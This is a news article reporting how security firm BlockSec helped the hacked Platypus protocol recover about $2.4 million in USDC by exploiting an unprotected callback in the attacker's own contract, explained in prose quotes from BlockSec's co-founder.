Platypus salvages $2.4 million in hacked funds with BlockSec's help

Quick Take

  • The hacker who exploited Platypus only made off with a small portion of the initially stolen funds.
  • Blockchain security firm BlockSec found a loophole in the attacker’s contract and called back $2.4 million into Platypus’ address with an upgrade proxy implementation.

After the Platypus protocol was hacked yesterday, at least $2.4 million in USDC stablecoin was returned to the exploited platform with help from blockchain security firm BlockSec.

Of the almost $9.1 million in stolen funds from Platypus, it was revealed that the attacker could only cash out $270,000, according to MetaSleuth, a visualization tool from Blocksec.

Some $8.5 million of stolen funds are frozen in the contract they were transferred to, and another $380,000 from a second attempted exploit were accidentally sent back to Aave, on-chain data show.

Retrieving a portion of the stolen funds for Platypus revolved around BlockSec’s plan to take advantage of a loophole in the attacker’s contract.

“By leveraging this loophole, the project can transfer the funds from the attacker contract to the project's account,” Yajin Zhou, co-founder of BlockSec told The Block.

"The project recovered $2 million using the proof of concept provided by us. This was to recover the funds in the attacker's contract,” according to Zhou, who added that some $8 million in assets were stranded since the attacker contract lacks a transfer function.

Callback the hack

To get back the crypto, BlockSec used a callback function in the attacker’s contract.

"The attack was launched through the flash loan callback interface in the attack contract. This callback function has no access control. And during this callback function, the attacker hardcoded the logic to approve USDC to the project’s contract (which is a proxy),” Zhou noted.

“So the project can first invoke the callback function in the attacker contract to approve USDC to the project’s contract. Then the project contract can withdraw the USDC from the attacker contract by upgrading the proxy to a new implementation," said Zhou.

Correction: Updated to correct Platypus' formal name. 

© 2023 The Block. All Rights Reserved. This article is provided for informational purposes only. It is not offered or intended to be used as legal, tax, investment, financial, or other advice.